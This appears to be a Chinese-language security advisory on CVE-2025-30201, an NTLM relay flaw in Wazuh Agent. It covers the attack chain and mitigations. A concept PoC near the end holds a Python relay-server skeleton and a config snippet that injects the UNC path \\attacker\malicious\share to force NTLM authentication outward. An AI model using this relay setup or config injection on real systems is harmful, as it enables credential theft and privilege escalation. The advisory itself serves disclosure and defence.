CVE-2025-30201 Wazuh Agent NTLM中继攻击导致权限提升和RCE

漏洞信息

漏洞编号

CVE-2025-30201

漏洞类型

NTLM中继攻击

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Wazuh Agent

漏洞概述

CVE-2025-30201是Wazuh Agent中的一个高危安全漏洞，CVSS评分7.7。攻击者可利用恶意UNC路径强制发起NTLM认证，进而发起NTLM中继攻击，最终实现权限提升和远程代码执行。该漏洞影响4.13.0之前的所有版本，攻击者需要具备Wazuh Agent的高权限认证。攻击成功后，攻击者可绕过当前权限限制，获得系统级访问权限，执行任意代码。Wazuh是一个开源威胁预防、检测和响应平台，广泛应用于企业安全运维场景。该漏洞已被修复，用户应升级到4.13.0或更高版本。

技术细节

漏洞根源在于Wazuh Agent在处理配置文件时未对UNC路径进行安全验证。攻击者通过在agent配置设置中注入恶意UNC路径（如\\attacker\share），当agent尝试访问这些路径时，会触发NTLM认证流程。攻击者可在同一网络环境中部署NTLM中继工具，截获并转发认证请求到目标服务（如SMB服务器、AD域控制器等）。由于NTLM协议设计缺陷，中继的认证可被用于冒充合法agent身份，从而绕过认证机制获取更高权限。最终攻击者可利用中继获得的凭证执行命令，在Wazuh服务器或关联系统中实现远程代码执行。攻击利用了Wazuh Agent的多处配置入口，包括但不限于syscheck、rootcheck等模块的配置参数。

攻击链分析

STEP 1

步骤1

攻击者获取Wazuh Agent的高权限认证凭据或会话

STEP 2

步骤2

攻击者在agent配置中注入恶意UNC路径（如\\attacker\share）

STEP 3

步骤3

Wazuh Agent尝试访问恶意UNC路径，触发NTLM认证请求

STEP 4

步骤4

攻击者部署的NTLM中继服务器截获认证请求

STEP 5

步骤5

中继服务器将认证请求转发到目标服务（如域控制器或SMB服务器）

STEP 6

步骤6

利用中继获得的认证会话冒充agent身份，获取更高权限

STEP 7

步骤7

在Wazuh服务器或关联系统上执行任意命令，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-30201 NTLM Relay PoC (Concept)
# Attacker's NTLM relay server setup

import socket
import struct
from impacket import ntlm

def start_relay_server():
    """Start NTLM relay server to capture and relay authentication"""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 445))
    server.listen(5)
    
    print('[+] NTLM Relay Server listening on port 445')
    
    while True:
        conn, addr = server.accept()
        print(f'[*] Connection received from {addr}')
        
        # Capture NTLM authentication
        ntlm_negotiate = conn.recv(1024)
        
        # Relay to target (e.g., Wazuh server or DC)
        target = 'target_server'
        relay_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        relay_conn.connect((target, 445))
        
        # Forward NTLM messages
        relay_conn.sendall(ntlm_negotiate)
        
        # Execute commands with relayed credentials
        # ... (full exploit requires Wazuh-specific knowledge)

# Malicious UNC path injection example
malicious_config = '''
<ossec_config>
  <syscheck>
    <directories check_all="yes">\\attacker\malicious\share</directories>
  </syscheck>
</ossec_config>
'''

print('[+] Malicious config generated for Wazuh Agent injection')

影响范围

Wazuh Agent < 4.13.0

防御指南

临时缓解措施

立即升级Wazuh Agent到4.13.0版本。短期内可采取以下措施：1) 限制agent配置权限，仅允许受信任管理员修改；2) 在防火墙层面阻止445端口的非授权访问；3) 启用SMB签名防止中继攻击；4) 监控异常的网络认证行为；5) 对agent通信实施严格的网络隔离。